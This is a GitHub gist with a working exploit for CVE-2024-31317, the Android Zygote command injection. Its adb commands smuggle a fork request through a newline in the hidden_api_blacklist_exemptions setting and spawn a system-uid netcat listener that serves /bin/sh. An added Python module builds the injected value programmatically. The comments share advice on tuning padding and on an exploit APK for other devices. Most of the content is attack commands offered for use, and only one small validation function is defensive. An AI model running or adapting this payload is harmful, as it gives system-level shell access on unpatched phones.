@ybtag
Created January 8, 2025 19:43
Gist ybtag/db3f3595139556c773fb94b7cbe668b5
CVE-2024-31317
# Run from an adb shell: the shell user is allowed to write global settings.
# Stop Settings first so that launching it below forces a fresh fork request to Zygote.
am force-stop com.android.settings
# system_server forwards this value to the Zygote command socket one entry per line
# without rejecting embedded newlines. The first line is a harmless-looking exemption
# entry; everything after the newline is read by Zygote as a new command: 15 arguments
# that fork a uid/gid 1000 (system) process with supplementary group 3003 (inet) and a
# --invoke-with wrapper, a toybox nc listener on 127.0.0.1:1234 serving /system/bin/sh.
settings put global hidden_api_blacklist_exemptions "LClass1;->method1(
15
--runtime-args
--setuid=1000
--setgid=1000
--runtime-flags=2049
--mount-external-full
--target-sdk-version=29
--setgroups=3003
--nice-name=runnetcat
--seinfo=platform:su:targetSdkVersion=29:complete
--invoke-with
toybox nc -s 127.0.0.1 -p 1234 -L /system/bin/sh -l;
--instruction-set=arm
--app-data-dir=/data/
--package-name=com.android.settings
android.app.ActivityThread
"
# Launching Settings makes system_server push the exemption list (and with it the
# injected command) to Zygote ahead of the fork request for the app.
am start -a android.settings.SETTINGS
# Connect to the listener to get the shell running as system.
nc localhost 1234
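The payload above is hand-assembled, and the count line "15" has to match the number of lines that follow exactly. The Python below is an added example, not code from the gist nor from the exploit app discussed in the comments: it models the framing system_server uses on the Zygote command socket (a count line, then one argument per line) and a reader that consumes commands the way a Zygote connection loop does, so the effect of an embedded newline in the setting value is visible as a second parsed command. Both the writer and the reader are simplified stand-ins for Android's code, the function names are the example's own, and the validation at the end is the example's, not the Android patch.

```python
"""Model of the Zygote command framing abused by CVE-2024-31317.

Added example, not code from the gist or from the exploit app discussed in
the comments. system_server forwards each entry of the
hidden_api_blacklist_exemptions setting to the Zygote command socket as one
line of a counted command; a newline inside an entry therefore ends that
command early and the rest of the value is read as a fresh command. The
framing and reader below are a simplified stand-in for Android's code.
"""
from __future__ import annotations

# The 15 arguments of the fork request in the gist, one per socket line.
GIST_ARGS = [
    "--runtime-args",
    "--setuid=1000",
    "--setgid=1000",
    "--runtime-flags=2049",
    "--mount-external-full",
    "--target-sdk-version=29",
    "--setgroups=3003",
    "--nice-name=runnetcat",
    "--seinfo=platform:su:targetSdkVersion=29:complete",
    "--invoke-with",
    "toybox nc -s 127.0.0.1 -p 1234 -L /system/bin/sh -l;",
    "--instruction-set=arm",
    "--app-data-dir=/data/",
    "--package-name=com.android.settings",
    "android.app.ActivityThread",
]


def exemptions_message(setting_value: str) -> str:
    """Text system_server writes for a new exemption list (model).

    The value is split on commas into entries; the command is the
    --set-api-denylist-exemptions flag followed by every entry, preceded by
    the argument count. Entries are copied verbatim, which is the defect.
    """
    args = ["--set-api-denylist-exemptions", *setting_value.split(",")]
    return f"{len(args)}\n" + "".join(arg + "\n" for arg in args)


def read_commands(stream: str) -> list[list[str]]:
    """Consume the stream like a Zygote connection loop (model).

    Each command is a decimal count line followed by that many argument
    lines. An empty count line stands in for the socket having nothing
    further to deliver.
    """
    lines = stream.split("\n")
    commands: list[list[str]] = []
    pos = 0
    while pos < len(lines):
        header = lines[pos]
        pos += 1
        if header == "":
            break
        count = int(header)
        args = lines[pos:pos + count]
        if len(args) != count:
            raise ValueError("truncated command")
        pos += count
        commands.append(args)
    return commands


def build_injected_setting(zygote_args: list[str],
                           prefix: str = "LClass1;->method1(") -> str:
    """Setting value that smuggles a second command, as the gist does by hand.

    prefix fills the one entry slot the legitimate command expects; the
    newline after it starts the injected command, whose count line is
    computed here instead of typed. Arguments containing a comma (split by
    system_server) or a newline (changes the count Zygote sees) are refused.
    """
    for arg in zygote_args:
        if "," in arg or "\n" in arg:
            raise ValueError(f"argument breaks the framing: {arg!r}")
    return prefix + "\n" + f"{len(zygote_args)}\n" + "\n".join(zygote_args)


def is_safe_exemption_value(setting_value: str) -> bool:
    """Check a forwarder should apply before calling exemptions_message().

    This is the example's own validation, not Android's patch: with line
    terminators refused, the value can only ever add entries to the one
    command system_server meant to send. A carriage return is refused as
    well because Java's readLine() also treats it as a line terminator.
    """
    return "\n" not in setting_value and "\r" not in setting_value


if __name__ == "__main__":
    value = build_injected_setting(GIST_ARGS)
    for cmd in read_commands(exemptions_message(value)):
        print(f"{len(cmd)} args:", cmd[:2], "..." if len(cmd) > 2 else "")
```

Running the module prints two commands: the two-argument exemption command system_server meant to send, and the fifteen-argument fork request from the gist. If you adapt the payload for another device, build it with build_injected_setting() rather than editing the count line by hand; a count that is off by one is read by Zygote as a truncated or oversized command, which is one source of the odd, non-repeating errors mentioned in the comments.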
rabits commented Mar 7, 2026

Thank you @ThexXTURBOXx for the update! Checked on my still-the-same VER-N49 (Android 13, 7.2.0.108(C636E1R2P2)) - and no luck... In the meantime I tried some different approaches (like the GPU exploit from Quest 3) - but still nothing... This is surely a tough nut to crack.

ThexXTURBOXx commented Mar 8, 2026

@rabits I also tried out the same GPU exploit on my Honor 10, but didn't get anywhere, sadly. But it's good to know that your Honor phone is on Android 13, as this needs some additional setup, as seen here:
https://github.com/ThexXTURBOXx/CVE-2024-31317/blob/main/31317/app/src/main/java/com/fh/exp31317/MainActivity.java#L230-L241
I am guessing that my code is already rather correct also for your device, but the padding does not have the correct length(s). Feel free to experiment with that a bit, of course, and let me know if you find some padding lengths that work!
When trying out a few length combinations, keep an eye on the logcat output. Especially when it says something like "Broken pipe", you need to act upon it. I just rebooted the entire device in this case. It may be enough to force-stop the exploit app and restart it, but I am not 100% certain and have not tried it.
I also encountered other errors that seemed rather odd and were nondeterministic for some reason. Most of them can be ignored, but maybe they do actually carry some important info that you can (ab)use to your benefit (by comparing with the Zygote source code).

@ThexXTURBOXx

Probably not the update you waited for, but maybe it helps..?
I have pushed a version 1.0.2 of "my" exploit apk, which adds "Init Connection Mode".
There, the socket/shell is actually opened at the system user end. This has the advantage that the shell is reusable and the app can even tell you whether the exploit succeeded or not.
Currently, it tries to apply the exploit 20 times and gives up after that (you should probably restart your phone anyway if it fails that many times).
But yeah, maybe this is enough to finally get into your phone @rabits? :)

rabits commented Mar 16, 2026

@ThexXTURBOXx thank you, sorry, I haven't had much time to even try - but yeah, I'll surely test it next week.
